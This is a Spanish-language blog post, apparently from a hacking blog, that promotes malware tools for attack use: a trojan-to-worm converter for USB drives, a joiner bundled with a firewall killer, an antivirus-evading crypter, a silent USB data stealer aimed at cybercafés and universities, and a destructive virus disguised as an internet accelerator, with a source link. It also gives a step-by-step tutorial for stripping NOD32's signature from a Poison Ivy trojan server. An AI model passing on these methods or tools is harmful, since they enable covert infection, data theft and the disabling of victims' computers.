tengan un buen av como nod32 nota:desactiven los av para descargar si desean la 4ta parte envienme un mp
1.Ya salio la version 2.0 de trojan to worm de karcrack, programa para convertir tu troyano en un gusano que se propaga mediante discos extraibles.
Como se puede ver se añadieron varias caracteristicas como:
-Habilitar UPX: supongo que para comprimirlo.
-Habilitar Melt: para elimiar el archivo una vez ejecutado.
-Crear copia de seguridad: crea una copia de seguridad de tu server, antes de convertirlo en gusano.
-Se agrego una caracteristica de filtrado para que no infecte determinado usuario, la version vieja solo tenia para no infectar una determinada unidad extraible.
-Permite activarlo en una determinada fecha
-Permite mostrar un mensaje al ejecutar el gusano.
-Permite deshabilitar varias opciones de windows como el administrador de tareas, opciones de carpeta, etc
-Tambien tiene la posibilidad de seleccionar un icono para el gusano.
-Y por supuesto un nuevo y mejor diseño
2.De la mano de 4n0nym0us, les traigo el Billar Joiner 2.0, la nueva version de este fabuloso joiner.
El Joiner incluye un compresor UPX y la opcion de cambiarle el icono al archivo final, y como regalo adicional se incluye un Firewallkiller adjuntado en la descarga.
ADVERTENCIA: NO ABRAN EL FIREWALLKILLER EN SUS PCS, ESTE ES PARA ADJUNTARLO CON EL BINDER SI LO DESEAN
Ar crypt es un encriptador privado scantime que deja los archivos encriptados 100% indetectable a los antivirus, los encriptadores scantime solo encriptan durante el escaneo, no durante la ejecucion (runtime), osea que si lo escanean con cualquier antivirus le saldra que el archivo no contiene virus, pero al ejecutarlo el antivirus dara la alerta.
Esto puede ser util para enviar por mail archivos muy detectados por los avs de hotmail o gmail como el bifrost, pero para lo que mas se usa es para encriptar avkillers u otra clase de virus, no es muy recomendado para troyanos.
3.Introduccion:
En este video se ve como dejo un server puro del troyano poison ivy 2.3.2 indetectable al antivirus nod32 actualizado al dia.
El metodo que uso es uno de los mas faciles y rapidos, lo que realizo es buscar y encontrar la firma detectada por el antivirus con el signaturezero, reemplazando con ceros por partes el codigo hasta ayarla, una vez ayada la firma detectada exactamente, simplemente la reemplazo con ceros y el server queda indetectable al antivirus y totalmente funcional. Este metodo no requiere de edicion hexadecimal, cambios de flujo ni nada de eso, simplemente lo que se hace es borrar la firma, por lo tanto no funcionara con todos los troyanos ni con la mayoria de los encriptadores, porque romperian el archivo, si lo quieren terminar con cualquier encriptador o troyano pueden continuar leyendo el manual de Octalh (desde pag9).
Yo lo demostre con el poison ivy porque el tamaño de su server es muy pequeño y es rapido para encontrar las firmas, y utilize el nod32 porque es el antivirus que utilizo, pero un amigo lo probo con el KAV y funciona perfectamente (tienen que desactivar la inyeccion en la creacion del server para que no lo detecte la defensa proactiva de mierda)
link: http://www.videos-star.com/watch.php?video=KSkus9thLYY
Pasos que realize:
-Primero y principal exclui del nod32 la carpeta con la que voy a trabajar por el simple hecho de evitar que salte el cartelito diciendo que se encontro un virus cada vez que ejecuto el signaturezero, el poison ivy, los server, y demas.
-Descargue el poison ivy 2.3.2 y el signaturezero y los puse en la carpeta donde trabajare, anteriormente excluida con el nod32.
-Lo siguiente que realize fue crear el server del poison ivy 2.3.2 y lo coloque en la misma carpeta con el nombre SERVER.exe.
-Lo escanie con el nod32 y obiamente lo detectaba como troyano.
-Ejecute el siganturezero y abri el server que cree con el poison ivy (SERVER.exe)
-Rellene con ceros la parte de la derecha del server y guarde el archivo resultante con nombre "1" sin extencion.
-Abri el notepad para anotar los datos, en este caso anote 3498 que es hasta donde rellenare de ceros (no es nesesario, pero sirve para agilizar)
-Escanie el archivo "1" que guarde, con el nod32 y me aparecia que el archivo estaba infectado, lo que quiere decir que la firma que buscamos se encuentra del lado izquierdo, ya que no se relleno de ceros ese lado.
-Abri de vuelta el signaturezero, abri el server y rellene de ceros la parte izquierda del server desde 512 hasta 3498 y guarde el archivo como "2"
-Escanie el archivo "2" con el nod y me decia que el archivo estaba desinfectado, quiere decir que la firma se encuentra entre 512 y 3498.
-Despues avanze un poco hacia la izquierda, pase de 3498 a 2505, lleno de ceros guarde como "3" y analise el server: limpio, por lo tanto la firma se encuentra entre 512 y 2505.
-Seguidamente avanze hacia la derecha de 512 a 1287 lleno de ceros, guardo, analizo: server limpio, la firma se encuentra entre 1287 y 2505
-Avanzo hacia izquierda de 2505 a 2029, lleno, guardo, analizo, server limpio, la firma se encuentra entre 1287 y 2029
-Y haci sigo hasta que llego a llenar de ceros entre 1679 y 1777, guardo, analizo y me da que esta infectado, por lo tanto la firma no esta entre 1679 y 1777, por logica tiene que estar entre 1777 y 2029 y sigo el procedimiento.
-De esta manera sigo avanzando de izquierda a derecha e inversamente hasta llegar ayar la firma.
-Una vez allada la firma exacta (en mi caso esta entre 1971 y 1973), la relleno de ceros y guardo el archivo resultante con extencion .exe.
-Eso es todo ya tengo mi server del poison ivy indetectable al nod32 y pueden ver que funciona perfectamente.
4.Esta aplicacion creada por Angel Sanchez, sirve para robar toda la informacion que se encuentre en un disco extraible, puede ser utilizado en ciberCafes universidades, etc.
Cuando se inserta un disco extraíble (pendrive, mp3, mp4, camaras, etc.) todos los datos serán copiados de forma silenciosa a una carpeta oculta.
Este programa puede ser muy util para algunas personas, ademas no es reconocido como una herramienta de hacking, asi que es totalmente indetectable por los antivirus.
5.InterSpeedNet es un Virus creado por Eazy, muy simple pero efectivo. Lo bueno que tiene es que es indetectable y open source, ideal para los que quieren aprender sobre el tema.
Solo posteo el virus para que lo analizen y vean como funciona (tambien para que vean que los antivirus no sirven jaja), cada uno se hace responsable del uso del mismo.
Esta creado en Autoit y el source esta al final del post.
el link del source:http://pastebin.com/f2cedfc7b
El archivo simula ser un Accelerador de velocidad de internet. Lo que hace es crear entradas aleatorias en registro, y dejar completamente inutilizable la pc al que lo ejecute, no la podra ni prender.
NO ABRAN EL ARCHIVO SI NO SABEN QUE VAN A HACER, ES UN VIRUS, NO UN GENERADOR DE VIRUS COMO LOS OTROS DEL BLOG, SI LO ABREN NO PODRAN PRENDER LA PC. RECOMIENDO PROBARLO EN MAQUINAS VIRTUALES. TAMPOCO LO SUBAN A VIRUSTOTAL NI WEB SIMILARES
si se auto infectan o lo habrieron por error aqui la solucion
basta solo con entrar a modo seguro de windows y borrar la entarda de registro :
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /v svchost32 /d %windir%\svcshost.bat
creo que no volvere a hcer mas post de estos por falta de tiempo
0 comentarios:
Publicar un comentario